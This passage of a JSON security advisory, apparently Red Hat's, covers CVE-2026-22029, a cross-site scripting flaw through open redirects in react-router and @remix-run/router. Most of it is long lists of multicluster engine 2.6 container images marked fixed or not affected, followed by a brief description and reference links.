2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2428412"}], "notes": [{"category": "description", "text": "A cross site scripting flaw has been discovered in the npm react-router and @remix-run/router packages. React Router (and Remix v1/v2) SPA open navigation redirects originating from loaders or actions in Framework Mode, Data Mode, or the unstable RSC modes can result in unsafe URLs causing unintended javascript execution on the client. This is only an issue if you are creating redirect paths from untrusted content or via an open redirect.", "title": "Vulnerability description"}, {"category": "summary", "text": "@remix-run/router: react-router: React Router vulnerable to XSS via Open Redirects", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x"], "known_not_affected": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-22029"}, {"category": "external", "summary": "RHBZ#2428412", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2428412"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-22029", "url": "https://www.cve.org/CVERecord?id=CVE-2026-22029"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-22029", "url": 